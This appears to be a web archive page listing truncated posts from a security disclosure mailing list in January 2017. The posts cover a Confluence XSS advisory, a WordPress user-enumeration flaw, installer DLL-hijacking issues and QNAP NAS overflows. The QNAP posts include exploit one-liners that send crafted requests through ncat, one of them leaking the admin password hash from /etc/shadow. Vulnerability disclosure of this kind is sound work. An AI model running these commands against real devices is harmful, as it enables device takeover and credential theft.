Posted by jlss on Jan 06

Sorry, the right title is:

Persisted Cross-Site Scripting (XSS) in Confluence Software

Posted by David Black on Jan 06

Just to clarify the issue only affects Confluence versions < 5.10.6.
You can find the original bug report at
https://jira.atlassian.com/browse/CONF-43162.

Posted by dxw Security on Jan 04

Details
================
Software: Stop User Enumeration
Version: 1.3.4
Homepage: https://wordpress.org/plugins/stop-user-enumeration/
Advisory report: https://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Stop User Enumeration does not stop user enumeration

Vulnerability
================
Traditionally user…

Posted by Moritz Naumann on Jan 04

Hi Jodson,

Am 03.01.2017 um 19:50 schrieb jlss:

your advisory mentions both Confluence and JIRA, which, as far as I
know, are separate Atalssian products.

Are both affected?

Thanks for clarifying,

Moritz

Posted by Stefan Kanthak on Jan 03

Hi @ll,

the executable installer “InstallTinyPDF.exe”, available from
<http://tinypdf.com/downloads.html>, is (surprise.-) vulnerable:

1. DLL hijacking (this is well-known and well-documented; see
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
<https://capec.mitre.org/data/definitions/471.html>,
<…

Posted by Stefan Kanthak on Jan 03

Hi @ll,

the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.

The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory “%TEMP%7zSxxxxxxxx” to extract
its payload, then executes “%TEMP%7zSxxxxxxxxspsetup.exe”.

“%TEMP%7zSxxxxxxxx” inherits the NTFS access rights…

Posted by bashis on Jan 03

Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)

[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en “B”;done | base64 -w 0 ;
echo -en “Dx56xcex06x08″ | base64 -w 0` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***…

Posted by bashis on Jan 03

And also;

==================
[Stack overflow]
==================

[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en “QUFB”;done“echo -en
“QUJCQkI=”` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Mon, 02 Jan 2017 11:59:24 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain

[Remote Host]#

====

[Local Host]# dmesg | grep…

Posted by bashis on Jan 03

Greetings,

Twice I tried to use the QNAP Web page (https://aid.qnap.com/event/_module/nas/safe_report/) for reporting
vulnerability, and twice I got mailer-daemon back.

So, I’ll post my vulnerabilities here instead (Was not meant to be 0-day… whatever).

Have a nice day (and happy new year)
/bashis

==================
1) [Heap overflow]
==================

Path: /home/httpd/cgi-bin/cgi.cgi
u = valid user [guest|admin]

1.1)

/* Remote */…

Posted by jlss on Jan 03

=====[ Tempest Security Intelligence – ADV-3/2016 CVE-2016-6283
]==============

Persisted Cross-Site Scripting (XSS) in Confluence Jira Software
—————————————————————-

Author(s):
– Jodson Santos
– jodson.santos () tempest com br

Tempest Security Intelligence – Recife, Pernambuco – Brazil

=====[ Table of Contents
]=====================================================

1….